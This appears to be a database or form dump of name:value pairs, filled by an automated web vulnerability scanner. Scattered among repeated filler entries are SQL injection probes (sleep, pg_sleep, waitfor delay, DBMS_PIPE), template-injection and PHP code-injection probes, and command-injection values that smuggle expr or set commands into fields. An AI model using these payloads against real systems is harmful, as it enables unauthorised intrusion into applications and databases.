admin'/**/and(select'1'from/**/pg_sleep(4))>'0:12345678 |
admin'/**/and(select'1'from/**/pg_sleep(0))>'0:12345678 |
admin"and(select*from(select+sleep(4))a/**/union/*:12345678 |
admin"and(select*from(select+sleep(0))a/**/union/*:12345678 |
admin'and(select*from(select+sleep(4))a/**/union/*:12345678 |
admin'and(select*from(select+sleep(0))a/**/union/*:12345678 |
admin"and"m"="n:12345678 |
admin"and"q"="q:12345678 |
admin'and'l'='x:12345678 |
admin'and'o'='o:12345678 |
admin'"\(:12345678 |
admin鎈'"\(:12345678 |
admin'and/**/convert(int,sys.fn_sqlvarbasetostr(Ha:12345678 |
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5':12345678 |
admin/**/and/**/cast(md5('1426032694')as/**/int)>0:12345678 |
admin'and(select'1'from/**/cast(md5(1272700047)as/:12345678 |
extractvalue(1,concat(char(126),md5(1177190875))):12345678 |
admin"and/**/extractvalue(1,concat(char(126),md5(1:12345678 |
admin'and/**/extractvalue(1,concat(char(126),md5(1:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
<%- 997292599+933351534 %>:12345678 |
#set($c=931693753+801611718)${c}$c:12345678 |
${(973439289+884959720)?c}:12345678 |
${954211012+896945356}:12345678 |
/*1*/{{929985871+958401525}}:12345678 |
'-var_dump(md5(649728979))-':12345678 |
${@var_dump(md5(154494494))};:12345678 |
admin&set /A 839206022+956806289:12345678 |
admin$(expr 967030771 + 864032673):12345678 |
admin|expr 930202436 + 934341213:12345678 |
admin
expr 838774858 + 813036403:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:'-var_dump(md5(215710525))-' |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:<%- 853285200+949840276 %> |
admin:#set($c=893602894+816419850)${c}$c |
admin:${(996608791+972200593)?c} |
admin:${898761464+972302340} |
admin:/*1*/{{949055270+891237047}} |
admin:'-var_dump(md5(215710525))-' |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
jdkfvwvgxxsjjxbssqiv:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:${@var_dump(md5(663931631))}; |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678&set /A 927872327+952779230 |
admin:12345678 |
admin:12345678$(expr 945501224 + 983781568) |
admin:12345678 |
admin:12345678 |
admin:12345678 |
admin:12345678|expr 819408143 + 897157724 |
admin:12345678
expr 826961962 + 855171952 |
admin:jdkfvwvgxxsjjxbssqiv |
admin:12345678 |
@@a68YJ:555 |
1 ����%2527%2522:555 |
1'":555 |
-1" OR 2+628-628-1=0+0+0+1 --:555 |
-1' OR 2+262-262-1=0+0+0+1 or 'AiNFAVqO'=':555 |
-1' OR 2+891-891-1=0+0+0+1 --:555 |
-1 OR 2+850-850-1=0+0+0+1:555 |
-1 OR 2+105-105-1=0+0+0+1 --:555 |
VWXCUbf1:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:@@LM1EB |
nZkkAbWB:1 ����%2527%2522 |
nZkkAbWB:1'" |
nZkkAbWB:(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ |
nZkkAbWB:0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z |
nZkkAbWB:0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z |
nZkkAbWB:if(now()=sysdate(),sleep(15),0) |
nZkkAbWB:555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' |
nZkkAbWB:555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) |
nZkkAbWB:peL2HHQE')) OR 732=(SELECT 732 FROM PG_SLEEP(15))-- |
nZkkAbWB:PaqoUW8I') OR 998=(SELECT 998 FROM PG_SLEEP(15))-- |
nZkkAbWB:YuGaurrT' OR 625=(SELECT 625 FROM PG_SLEEP(15))-- |
nZkkAbWB:-1)) OR 898=(SELECT 898 FROM PG_SLEEP(15))-- |
nZkkAbWB:-5) OR 246=(SELECT 246 FROM PG_SLEEP(15))-- |
nZkkAbWB:-5 OR 544=(SELECT 544 FROM PG_SLEEP(15))-- |
nZkkAbWB:dYe0IQtU')); waitfor delay '0:0:15' -- |
nZkkAbWB:4zwcu6LH'); waitfor delay '0:0:15' -- |
nZkkAbWB:5wRoVCTF'; waitfor delay '0:0:15' -- |
nZkkAbWB:1 waitfor delay '0:0:15' -- |
nZkkAbWB:-1)); waitfor delay '0:0:15' -- |
nZkkAbWB:-1); waitfor delay '0:0:15' -- |
nZkkAbWB:-1; waitfor delay '0:0:15' -- |
nZkkAbWB:-1" OR 2+904-904-1=0+0+0+1 -- |
nZkkAbWB:-1' OR 2+44-44-1=0+0+0+1 or 'UsRFgDxg'=' |
nZkkAbWB:-1' OR 2+720-720-1=0+0+0+1 -- |
nZkkAbWB:-1 OR 2+419-419-1=0+0+0+1 |
nZkkAbWB:-1 OR 2+465-465-1=0+0+0+1 -- |
nZkkAbWB:2OUWjrsn |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
nZkkAbWB:555 |
Peter Winter:555-555- |
Peter Winter:555-555- |
Peter Winter:555-555- |
Peter Winter:555-555- |
Peter Winter:555-555- |
{{9999771*10000276}}:1 |
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7�:1 |
acux9928��z1��z2a�bcxuca9928:1 |
acu6232<s1﹥s2ʺs3ʹuca6232:1 |
ywkxwvar9536496:1 |
|